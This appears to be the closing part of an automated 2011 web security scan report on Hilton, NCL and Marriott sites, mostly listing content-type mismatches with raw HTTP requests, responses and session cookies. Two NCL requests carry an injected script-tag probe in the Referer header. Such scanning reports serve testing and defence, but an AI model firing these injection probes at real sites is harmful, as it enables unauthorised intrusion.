Host:   http://www1.hilton.com
Path:   /en_US/hi/media/images/buttons/button_sendform.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a BMP image.

Request

GET /en_US/hi/media/images/buttons/button_sendform.gif HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/customersupport/feedback.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; NSC_qse-qgt=44153d5f3660; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637051053:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:54 GMT
ETag: "796-cf846c80"
Accept-Ranges: bytes
Content-Length: 1942
Content-Type: image/gif
Cache-Control: max-age=19004
Expires: Mon, 03 Oct 2011 18:33:48 GMT
Date: Mon, 03 Oct 2011 13:17:04 GMT
Connection: close

BM........6...(...................`...................i...N........vw..............?@......\].................|!".......................................................................................
...[SNIP]...
25.40. http://www1.hilton.com/favicon_hi.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www1.hilton.com
Path:   /favicon_hi.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon_hi.ico HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; NSC_qse-qgt=44153d5f3660

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:54 GMT
ETag: "1536-cf846c80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 5430
Vary: Accept-Encoding
Cache-Control: private, max-age=77070
Expires: Tue, 04 Oct 2011 10:17:19 GMT
Date: Mon, 03 Oct 2011 12:52:49 GMT
Connection: close

............ .h...&... .... .........(....... ..... .....@.............................................................................................................................................
...[SNIP]...
25.41. http://www2.ncl.com/files/json/promo.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www2.ncl.com
Path:   /files/json/promo.json

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /files/json/promo.json HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www2.ncl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_pers=%20s_nr%3D1317646033036-New%7C1320238033036%3B; s_sess=%20s_cc%3Dtrue%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 03 Oct 2011 12:01:01 GMT
ETag: "b7d752-12-4ae63ba833940"
Accept-Ranges: bytes
X-Ncl-SLog: (null)
Content-Length: 18
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=1133
Expires: Mon, 03 Oct 2011 13:05:45 GMT
Date: Mon, 03 Oct 2011 12:46:52 GMT
Connection: close
Vary: Accept-Encoding

{ "result": [ ] }
25.42. http://www2.ncl.com/files/json/query_all.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www2.ncl.com
Path:   /files/json/query_all.json

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /files/json/query_all.json HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www2.ncl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_pers=%20s_nr%3D1317646033036-New%7C1320238033036%3B; s_sess=%20s_cc%3Dtrue%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 03 Oct 2011 12:10:19 GMT
ETag: "a71822-5e22-4ae63dbc5a0c0"
Accept-Ranges: bytes
X-Ncl-SLog: (null)
Content-Length: 24098
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=1023
Expires: Mon, 03 Oct 2011 13:03:55 GMT
Date: Mon, 03 Oct 2011 12:46:52 GMT
Connection: close
Vary: Accept-Encoding

{"AggrRecords":[{"RecordCount":"2","RecordSpec":"18214_BESTFARE_0","AggRecDetailLink":"N=&Nr=AND%28p_Record_Type%3AI%2Cp_Fare_Code%3ABF%29&Nu=p_Itinerary_Code","DerivedProperties":{"p_Spa_Amt":"","p_I
...[SNIP]...
25.43. https://www2.ncl.com/files/json/promo.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www2.ncl.com
Path:   /files/json/promo.json

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /files/json/promo.json HTTP/1.1
Host: www2.ncl.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www2.ncl.com/vacationsf6ac7%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec7ba114d195
Cookie: Cookie=R1788641230; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_sess=%20s_cc%3Dtrue%3B%20c%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1317648231558-New%7C1320240231558%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 03 Oct 2011 13:01:02 GMT
ETag: "b7d752-12-4ae6491261f80"
Accept-Ranges: bytes
X-Ncl-SLog: (null)
Content-Length: 18
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=1798
Expires: Mon, 03 Oct 2011 13:53:26 GMT
Date: Mon, 03 Oct 2011 13:23:28 GMT
Connection: keep-alive
Vary: Accept-Encoding

{ "result": [ ] }
25.44. https://www2.ncl.com/files/json/query_all.json  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www2.ncl.com
Path:   /files/json/query_all.json

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /files/json/query_all.json HTTP/1.1
Host: www2.ncl.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://www2.ncl.com/vacationsf6ac7%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec7ba114d195
Cookie: Cookie=R1788641230; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_sess=%20s_cc%3Dtrue%3B%20c%3Dundefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1317648231558-New%7C1320240231558%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 03 Oct 2011 13:10:18 GMT
ETag: "b7b821-5e22-4ae64b24a0280"
Accept-Ranges: bytes
X-Ncl-SLog: (null)
Content-Length: 24098
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=1755
Expires: Mon, 03 Oct 2011 13:52:43 GMT
Date: Mon, 03 Oct 2011 13:23:28 GMT
Connection: keep-alive
Vary: Accept-Encoding

{"AggrRecords":[{"RecordCount":"2","RecordSpec":"18214_BESTFARE_0","AggRecDetailLink":"N=&Nr=AND%28p_Record_Type%3AI%2Cp_Fare_Code%3ABF%29&Nu=p_Itinerary_Code","DerivedProperties":{"p_Spa_Amt":"","p_I
...[SNIP]...
26. Content type is not specified  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://marriottinternationa.tt.omtrdc.net
Path:   /m2/marriottinternationa/sc/standard

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /m2/marriottinternationa/sc/standard?mboxHost=www.marriott.com&mboxSession=1317646533235-184575&mboxPage=1317646533235-184575&screenHeight=1200&screenWidth=1920&browserWidth=1074&browserHeight=906&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1317628536446&charSet=UTF-8&cookieDomainPeriods=2&pageName=www.marriott.com%2Fdefault.mi&resolution=1920x1200&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkTrackVars=None&linkTrackEvents=None&prop5=US&prop8=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar15=Weekday%20%3A%20Monday%20%3A%208%3A30AM&eVar35=First%20Visit&eVar41=US&mboxURL=http%3A%2F%2Fwww.marriott.com%2Fdefault.mi&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: marriottinternationa.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1317646533235-184575; mboxPC=1317646533235-184575.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1317646533235-184575.19; Domain=marriottinternationa.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:55:40 GMT; Path=/m2/marriottinternationa
Content-Length: 220
Date: Mon, 03 Oct 2011 12:55:39 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317646533235-184575.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...
Report generated by XSS.CX at Mon Oct 03 09:26:56 CDT 2011.